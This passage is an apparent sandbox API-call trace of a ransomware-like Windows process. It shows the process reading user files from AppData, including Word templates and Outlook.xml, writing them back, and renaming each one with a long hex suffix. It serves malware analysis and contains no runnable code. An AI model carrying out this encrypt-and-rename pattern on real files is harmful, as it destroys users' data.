lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav.983D854A09D7D2E94BA5AC31010B40AC5CE27566FEAA99EF8383B90D80536E70") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav.983D854A09D7D2E94BA5AC31010B40AC5CE27566FEAA99EF8383B90D80536E70" [0122.002] GetProcessHeap () returned 0x600000 [0122.002] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13e) returned 0x627860 [0122.002] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x627860, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0122.003] CloseHandle (hObject=0x31c) returned 1 [0122.004] GetProcessHeap () returned 0x600000 [0122.004] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0122.005] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.006] WriteFile (in: hFile=0x320, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x5400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0122.006] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.576] ReadFile (in: hFile=0x324, lpBuffer=0x32c1040, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0f08 | out: lpBuffer=0x32c1040*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0f08) returned 1 [0122.577] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.618] ReadFile (in: hFile=0x320, lpBuffer=0x32e9198, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c9060 | out: lpBuffer=0x32e9198*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32c9060) returned 1 [0122.619] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.846] ReadFile (in: hFile=0x308, lpBuffer=0x690478, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0122.853] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.854] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0122.855] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.868] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0122.869] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.879] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0122.880] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.888] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0122.889] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.898] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0122.898] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.907] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0122.908] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.923] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x25fff70) returned 0x0 [0122.923] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp", lpString2=".F41666CD616F4396C574E1F135B5A02284411E8E4569A9B0B24F303781900E4D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp.F41666CD616F4396C574E1F135B5A02284411E8E4569A9B0B24F303781900E4D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\f5 r4Tx3mN.bmp.F41666CD616F4396C574E1F135B5A02284411E8E4569A9B0B24F303781900E4D" [0122.923] GetProcessHeap () returned 0x600000 [0122.923] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x6daf30 [0122.925] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x6daf30, Length=0x126, FileInformationClass=0xa) returned 0x0 [0122.928] CloseHandle (hObject=0x324) returned 1 [0122.928] GetProcessHeap () returned 0x600000 [0122.928] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0122.931] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.001] ReadFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.001] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.002] WriteFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0123.004] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.005] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x25fff70) returned 0x0 [0123.006] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx", lpString2=".0FF45F6F7E2ACA2EF71A05E89B8148B2985703E01418C1B118F2FC77A6D89816" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.0FF45F6F7E2ACA2EF71A05E89B8148B2985703E01418C1B118F2FC77A6D89816") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.0FF45F6F7E2ACA2EF71A05E89B8148B2985703E01418C1B118F2FC77A6D89816" [0123.006] GetProcessHeap () returned 0x600000 [0123.006] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19a) returned 0x314ba28 [0123.006] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x25fff60, FileInformation=0x314ba28, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0123.008] CloseHandle (hObject=0x318) returned 1 [0123.008] GetProcessHeap () returned 0x600000 [0123.009] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.011] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.115] ReadFile (in: hFile=0x324, lpBuffer=0x3360140, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.120] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.121] WriteFile (in: hFile=0x324, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0123.125] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.126] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x25fff70) returned 0x0 [0123.126] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", lpString2=".099B90B0A5B159FE51B8672A90ED5A097B2602858432B83263DAF2DAFBF26553" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.099B90B0A5B159FE51B8672A90ED5A097B2602858432B83263DAF2DAFBF26553") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.099B90B0A5B159FE51B8672A90ED5A097B2602858432B83263DAF2DAFBF26553" [0123.126] GetProcessHeap () returned 0x600000 [0123.126] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x144) returned 0x3369af8 [0123.126] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x3369af8, Length=0x144, FileInformationClass=0xa) returned 0x0 [0123.135] CloseHandle (hObject=0x324) returned 1 [0123.136] GetProcessHeap () returned 0x600000 [0123.136] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.138] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.251] ReadFile (in: hFile=0x338, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0123.252] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.252] WriteFile (in: hFile=0x338, lpBuffer=0x6a0480, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 0x0 [0123.256] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.257] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x25fff70) returned 0x0 [0123.258] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx", lpString2=".CD48F3CE113DDEF69612ED0BA790B090B3D16F75D5C6C55DA8477E86ADE1C441" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx.CD48F3CE113DDEF69612ED0BA790B090B3D16F75D5C6C55DA8477E86ADE1C441") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx.CD48F3CE113DDEF69612ED0BA790B090B3D16F75D5C6C55DA8477E86ADE1C441" [0123.258] GetProcessHeap () returned 0x600000 [0123.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e4) returned 0x60dcb0 [0123.258] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x25fff60, FileInformation=0x60dcb0, Length=0x1e4, FileInformationClass=0xa) returned 0x0 [0123.260] CloseHandle (hObject=0x338) returned 1 [0123.260] GetProcessHeap () returned 0x600000 [0123.260] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0123.261] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.262] ReadFile (in: hFile=0x214, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0123.262] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.263] WriteFile (in: hFile=0x214, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0123.264] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.264] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0123.265] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", lpString2=".5D9F9BEE7BE7EBA3FF4FEBCB365A97774EE42F0B7ED1D972776D1FB2118F840D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.5D9F9BEE7BE7EBA3FF4FEBCB365A97774EE42F0B7ED1D972776D1FB2118F840D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.5D9F9BEE7BE7EBA3FF4FEBCB365A97774EE42F0B7ED1D972776D1FB2118F840D" [0123.265] GetProcessHeap () returned 0x600000 [0123.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x234) returned 0x3116fe0 [0123.265] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x3116fe0, Length=0x234, FileInformationClass=0xa) returned 0x0 [0123.267] CloseHandle (hObject=0x214) returned 1 [0123.267] GetProcessHeap () returned 0x600000 [0123.268] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0123.268] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.272] ReadFile (in: hFile=0x214, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0123.272] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.273] WriteFile (in: hFile=0x214, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0123.273] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.277] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x25fff70) returned 0x0 [0123.278] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx", lpString2=".3DBAFC0A0ABA0CD7B08BD837688989EDE3B2F1C471B99A2D1AA41AFDF8F6E95A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx.3DBAFC0A0ABA0CD7B08BD837688989EDE3B2F1C471B99A2D1AA41AFDF8F6E95A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx.3DBAFC0A0ABA0CD7B08BD837688989EDE3B2F1C471B99A2D1AA41AFDF8F6E95A" [0123.278] GetProcessHeap () returned 0x600000 [0123.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e0) returned 0x6db060 [0123.278] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x6db060, Length=0x1e0, FileInformationClass=0xa) returned 0x0 [0123.280] CloseHandle (hObject=0x214) returned 1 [0123.280] GetProcessHeap () returned 0x600000 [0123.280] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0123.283] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.290] ReadFile (in: hFile=0x214, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0123.291] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.291] WriteFile (in: hFile=0x214, lpBuffer=0x6a0480, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 0x0 [0123.292] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.293] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x6803f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6803f8, ReturnLength=0x25fff70) returned 0x0 [0123.293] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx", lpString2=".B1E9962364B890793450BFD3D465C39CE80788D447E80F4685FBDA5B54AEBF72" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx.B1E9962364B890793450BFD3D465C39CE80788D447E80F4685FBDA5B54AEBF72") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx.B1E9962364B890793450BFD3D465C39CE80788D447E80F4685FBDA5B54AEBF72" [0123.293] GetProcessHeap () returned 0x600000 [0123.293] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e0) returned 0x336dd78 [0123.294] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x336dd78, Length=0x1e0, FileInformationClass=0xa) returned 0x0 [0123.295] CloseHandle (hObject=0x214) returned 1 [0123.296] GetProcessHeap () returned 0x600000 [0123.296] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0123.296] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.383] ReadFile (in: hFile=0x324, lpBuffer=0x3360140, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.383] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.383] WriteFile (in: hFile=0x324, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.391] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, 